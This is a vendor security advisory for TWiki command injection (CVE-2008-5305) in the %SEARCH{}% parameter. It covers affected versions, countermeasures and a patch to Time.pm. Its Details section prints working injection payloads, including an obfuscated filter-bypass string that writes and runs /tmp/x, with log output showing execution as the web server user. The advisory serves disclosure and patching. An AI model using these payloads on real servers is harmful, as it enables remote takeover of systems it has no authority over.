TWiki Input Validation Flaw in %SEARCH{}% Parameter Lets Remote Users Execute Arbitrary Commands

This is a security advisory for TWiki installations:

The %SEARCH{}% TWiki variable allows arbitrary shell command  
execution. The TWiki.org advisory is at http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2008-5305

(See also unrelated TWiki Security Alert CVE-2008-5304 - Cross-site  
scripting vulnerability with TWiki URLPARAM variable.

    * Vulnerable Software Version
    * Attack Vectors
    * Impact
    * Severity Level
    * MITRE Name for this Vulnerability
    * Details
    * Countermeasures
    * Authors and Credits
    * Hotfix for TWiki Production Release 4.2.x
    * Hotfix for older affected TWiki Releases
    * Feedback
    * External Links


---++ Vulnerable Software Version

    * TWikiRelease04x02x03 -- TWiki-4.2.3.zip
    * TWikiRelease04x02x02 -- TWiki-4.2.2.zip
    * TWikiRelease04x02x01 -- TWiki-4.2.1.zip
    * TWikiRelease04x02x00 -- TWiki-4.2.0.zip
    * TWikiRelease04x01x02 -- TWiki-4.1.2.zip
    * TWikiRelease04x01x01 -- TWiki-4.1.1.zip
    * TWikiRelease04x01x00 -- TWiki-4.1.0.zip
    * TWikiRelease04x00x05 -- TWiki-4.0.5.zip
    * TWikiRelease04x00x04 -- TWiki-4.0.4.zip
    * TWikiRelease04x00x03 -- TWiki-4.0.3.zip
    * TWikiRelease04x00x02 -- TWiki-4.0.2.zip
    * TWikiRelease04x00x01 -- TWiki-4.0.1.zip
    * TWikiRelease04x00x00 -- TWiki-4.0.0.zip


---++ Attack Vectors

Editing wiki pages and HTTP GET requests towards the wiki server  
(typically port 80/TCP). Typically, prior authentication is necessary  
(including anonymous TWikiGuest accounts).


---++ Impact

An unauthenticated remote attacker can execute arbitrary shell and/or  
perl commands as the webserver user, such as user nobody.


---++ Severity Level

The TWiki SecurityTeam triaged this issue as documented in  
TWikiSecurityAlertProcess and assigned the following severity level:

    * Severity 1 issue: The web server can be compromised


---++ MITRE Name for this Vulnerability

The Common Vulnerabilities and Exposures project has assigned the name  
CVE-2008-5305 to this vulnerability, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5305


---++ Details

The %SEARCH{}% TWiki variable or a specially crafted GET URL enables a  
malicious user to compose a command line executed by the Perl backtick  
(``) operator. User input is passed to the perl "eval" command without  
first being sanitized.

If access to TWiki is not restricted by other means, attackers can use  
the SEARCH variable with or without prior authentication, depending on  
the configuration.

Proof of concept:

    * Enter the following in the search box:
      %SEARCH{ date="P`pr -?`" search="xyzzy" }%

    * Or use a GET URL like:%
      http://example.org/twiki/bin/view/Main/WebSearch?search=%25SEARCH%7Bdate%3D%22P%60pr+-%3F%60%22+search%3D%22xyzzy%22%7D%25&scope=all

Afterwards, evidence of command execution can be seen in the  
webserver's error_log:

[Thu Sep 11 22:13:36 2008] [error] [client 127.0.0.1] pr: invalid  
option -- ?
[Thu Sep 11 22:13:36 2008] [error] [client 127.0.0.1] Try `pr --help'  
for more information.
[Thu Sep 11 22:13:36 2008] [error] [client 127.0.0.1] [Thu Sep 11  
22:13:36 2008] view: Use of uninitialized value in concatenation (.)  
or string at /var/www/twiki/lib/TWiki/Time.pm line 441.

Arbitrary code execution is tedious due to the following:

    * forward slash not allowed
    * upper and lowercase y,m,w,d,h,s characters are not allowed
    * backslashes are escaped ('\' -> '\\')

An attacker may be able to circumvent this blacklist by uploading a  
file to a directory listed in $PATH and then executing it similar to  
the "pr" example above.

An attacker could also determine a transform that would bypass the  
disallowed characters.  A combination of perl variables and shell  
globbing functionality can be used to overcome the blacklist.  The  
following example uses perl's tr command to generate the blocked  
characters.  Once a set of perl variables exists, they are used to  
generate shell commands that are written to "/tmp/x" which is then  
executed (its output is redirected to stderr so that it appears in the  
error_log).

# A = m, B = y, C = s, E = d, F = h, G = w, X = /
%SEARCH{date="Pour $X='X';$X=~tr#X#\057#;our $A='X';$A=~tr#X#\155#;our  
%$B='X';$B=~tr#X#\171#;our $C='X';$C=~tr#X#\163#;our %$E='X';$E=~tr#X# 
\144#;our $F='X';$F=~tr#X#\150#;our %$G='X';$G=~tr#X#\167#;`ec${F}o $ 
{X}u${C}r${X}bin${X}i${E} > %${X}t${A}p${X}x;c${F}${A}o${E} +x ${X}t$ 
{A}p${X}x;${X}t${A}p${X}x %>&2;`" search="xyzzy"}%}

Here's the output in the error_log:

[Fri Sep 12 01:13:21 2008] [error] [client 127.0.0.1] uid=81(apache)  
gid=81(apache) groups=81(apache)


---++ Countermeasures

    * Apply hotfix (see patch below).
    * Upgrade to the latest patched production TWiki-4.2.4  
(TWikiRelease04x02x04 to be released shortly).
    * Use the web server software to restrict access to the web pages  
served by TWiki.
    * The {SafeEnvPath} configure setting can be used to restrict the  
possible directories that are searched for executables.  By default,  
this is the PATH used by the webserver user.  Set {SafeEnvPath} to a  
list of non-writable directories, such as "/bin:/usr/bin".


---++ Authors and Credits

    * Credit to Peter Allor, IBM Internet Security Systems for  
disclosing the issue to the twiki-security@lists.sourceforge.net  
mailing list, and for providing a vendor advisory with a proposed fix.
    * Peter Thoeny, Crawford Currie, Sopan Shewale for contributing to  
the fix, patch and advisory.


---++ Hotfix for TWiki Production Release 4.2.x

Affected file: twiki/lib/TWiki/Time.pm

Patch:

--- twiki/branches/TWikiRelease04x02/lib/TWiki/Time.pm
+++ twiki/branches/TWikiRelease04x02/lib/TWiki/Time.pm
@@ -431,13 +431,16 @@
         $ends[$i] =~ s/S/\*1\+/gi;
         #   possibly append '0' and evaluate numerically the string.
         $ends[$i] =~ s/\+$/+0/;
-        my $duration = eval($ends[$i]);
+        $ends[$i] =~ s#[^-\d+*/]##g;
+        my $duration = eval( $ends[$i] );
         #   the value computed, if it specifies the starting point
         #   in time, must be subtracted from the previously
         #   computed ending point.  if it specifies the ending
         #   point, it must be added to the previously computed
         #   starting point.
-        $ends[$i] = eval($ends[1-$i].$oper[$i].$ends[$i]);
+        my $expr = "$ends[1-$i]$oper[$i]($ends[$i])";
+        $expr =~ s#[^-\d+*/()]##g;
+        $ends[$i] = eval( $expr );
         # SMELL: if the user specified both start and end as a
         # time duration, some kind of error must be reported.
     }

---++ Hotfix for older affected TWiki Releases

Apply above patch (line numbers may vary).


---++ Feedback

Please provide feedback at the security alert page on twiki.org,
http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2008-5305


---++ External Links

http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2008-5305 - CVE  
on twiki.org
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5305 - CVE on  
MITRE.org
http://twiki.org/cgi-bin/view/Codev/TWikiSecurityAlertProcess -  
security alert process
http://twiki.org/cgi-bin/view/Codev/DownloadTWiki - download latest  
TWiki release


-- Contributors: PeterAllor, Troy Bollinger, Sopan Shewale,  
CrawfordCurrie, Peter Thoeny - 05 Dec 2008


-- 
   * Peter Thoeny, CTO - peter.thoeny.public@twiki.net
   * http://twiki.net  - TWIKI.NET - the Enterprise Wiki
   * http://twiki.org  - is your team already TWiki enabled?
   * Knowledge cannot be managed, it can be discovered and shared
   * This e-mail is:   (_) private    (_) ask first    (x) public

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us
This web site uses cookies for web analytics. Learn More
Copyright 2021, SecurityGlobal.net LLC